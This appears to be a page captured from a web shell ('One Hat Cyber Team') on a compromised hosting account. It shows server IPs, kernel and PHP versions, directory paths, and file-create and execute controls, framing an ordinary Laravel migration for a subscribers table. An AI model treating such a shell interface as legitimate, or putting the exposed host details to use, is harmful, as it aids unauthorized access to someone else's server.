One Hat Cyber Team
Your IP :
3.140.254.100
Server IP :
162.241.123.123
Server :
Linux sh016.hostgator.in 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Server Software :
Apache
PHP Version :
8.2.25
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home1
/
saicsazq
/
keedoai.com
/
database
/
migrations
/
View File Name :
2021_06_23_222150_create_subscribers_table.php
<?php use Illuminate\Database\Migrations\Migration; use Illuminate\Database\Schema\Blueprint; use Illuminate\Support\Facades\Schema; return new class extends Migration { /** * Run the migrations. * * @return void */ public function up() { Schema::create('subscribers', function (Blueprint $table) { $table->id(); $table->dateTime('active_until')->nullable(); $table->bigInteger('user_id')->unsigned(); $table->bigInteger('plan_id')->unsigned(); $table->string('status')->nullable(); $table->string('gateway')->nullable(); $table->string('model')->nullable(); $table->string('frequency')->nullable(); $table->string('subscription_id'); $table->integer('words')->nullable()->default(0); $table->integer('images')->nullable()->default(0); $table->integer('characters')->nullable()->default(0); $table->integer('minutes')->nullable()->default(0); $table->integer('max_tokens')->nullable(); $table->string('paystack_customer_code')->nullable(); $table->string('paystack_authorization_code')->nullable(); $table->string('paystack_email_token')->nullable(); $table->string('paddle_cancel_url')->nullable(); $table->timestamps(); }); } /** * Reverse the migrations. * * @return void */ public function down() { Schema::dropIfExists('subscribers'); } };